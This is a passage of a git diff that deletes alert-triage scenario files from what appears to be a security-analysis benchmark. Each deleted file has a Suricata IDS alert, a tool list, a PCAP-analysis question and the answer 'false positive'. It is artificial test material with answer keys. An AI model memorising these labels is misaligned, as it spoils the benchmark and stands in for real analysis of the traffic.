"You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json deleted file mode 100644 index a4e3bcc394834b897222c1ed09cc65ea32e9e772..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236124.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236124", - "alert_type": "False", - "alert_name": "dp_236124" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:41.519489+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:41.519489+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json deleted file mode 100644 index 35d7488c44a46e9e518d41ab5c70d51118f07e69..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236125.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236125", - "alert_type": "False", - "alert_name": "dp_236125" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:41.522243+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:41.522243+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json deleted file mode 100644 index 4c7307b0f8d1836263e0059d121a2228f89f6d7b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236126.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236126", - "alert_type": "False", - "alert_name": "dp_236126" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:15.743056+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:33454 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:54:15.743056+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:33454 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json deleted file mode 100644 index 80e05a558dc54d02a21267175fe42c7f0bae1a8f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236127.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236127", - "alert_type": "False", - "alert_name": "dp_236127" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:19.228942+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:19.228942+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json deleted file mode 100644 index e536a3e9b655ae5869343861ba2e6bd0a7baa05c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236128.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236128", - "alert_type": "False", - "alert_name": "dp_236128" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:39.579439+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:39.579439+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json deleted file mode 100644 index 43b2e900f2dd633c66ca658fcd55908855759996..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236129.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236129", - "alert_type": "False", - "alert_name": "dp_236129" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:39.585656+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:39.585656+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json deleted file mode 100644 index a43f1c380addb03e887706d07adec9c2c2b0971d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236130.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236130", - "alert_type": "False", - "alert_name": "dp_236130" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:42.959934+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:42.959934+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json deleted file mode 100644 index a37d6cb2bd8a65e102ac1698cd30586984000d03..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236131.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236131", - "alert_type": "False", - "alert_name": "dp_236131" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:54:42.966420+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:54:42.966420+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json deleted file mode 100644 index bbf1435e8cee8f6a98db21e6ccbbb291339fd521..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236132.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236132", - "alert_type": "False", - "alert_name": "dp_236132" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:20.668850+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:20.668850+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json deleted file mode 100644 index a8e34ef4bfdc9883014918b5091d71ddbe6be4c2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236133", - "alert_type": "False", - "alert_name": "dp_236133" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:25.137784+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:37996 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:55:25.137784+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:37996 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json deleted file mode 100644 index a1e9da9f8dae5664cc9315a3c48c0a7b1ed770b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236134", - "alert_type": "False", - "alert_name": "dp_236134" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:24.857770+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:24.857770+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json deleted file mode 100644 index ad3aefd2fc9d44774a9970b44cfcebc8fa354b50..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236135", - "alert_type": "False", - "alert_name": "dp_236135" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:24.870396+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:24.870396+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json deleted file mode 100644 index f822c0556465aea2a7a030a9c153120fc1127508..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236136", - "alert_type": "False", - "alert_name": "dp_236136" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:28.194618+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:28.194618+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json deleted file mode 100644 index e3d76ba0530422fe72fc74318bf0b85984ba77d4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236137", - "alert_type": "False", - "alert_name": "dp_236137" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:28.197874+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:28.197874+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json deleted file mode 100644 index 1c3f60fa80e570992758f5726ef01880968987b2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236138", - "alert_type": "False", - "alert_name": "dp_236138" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:41.019442+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:41.019442+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json deleted file mode 100644 index 4ab49bb3f64616b6b26522f30e39e4fc6ee538aa..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236139", - "alert_type": "False", - "alert_name": "dp_236139" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:41.023466+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:41.023466+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json deleted file mode 100644 index 6f898cb1b4be4e4c595b4dd389c5455495c7e61a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236140", - "alert_type": "False", - "alert_name": "dp_236140" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:44.400161+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:44.400161+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json deleted file mode 100644 index f295f3bddd6aae4752aeb47d08ff3d4140d1cc3b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236141", - "alert_type": "False", - "alert_name": "dp_236141" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:44.401834+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:44.401834+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json deleted file mode 100644 index 5dba4268aaa446fa0c67a783b4307dc0ec41ecf9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236142", - "alert_type": "False", - "alert_name": "dp_236142" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:22.108843+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:22.108843+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json deleted file mode 100644 index 386d928dff96002c24166396d306b0aabc7cb585..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236143", - "alert_type": "False", - "alert_name": "dp_236143" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:42.459068+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:42.459068+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need 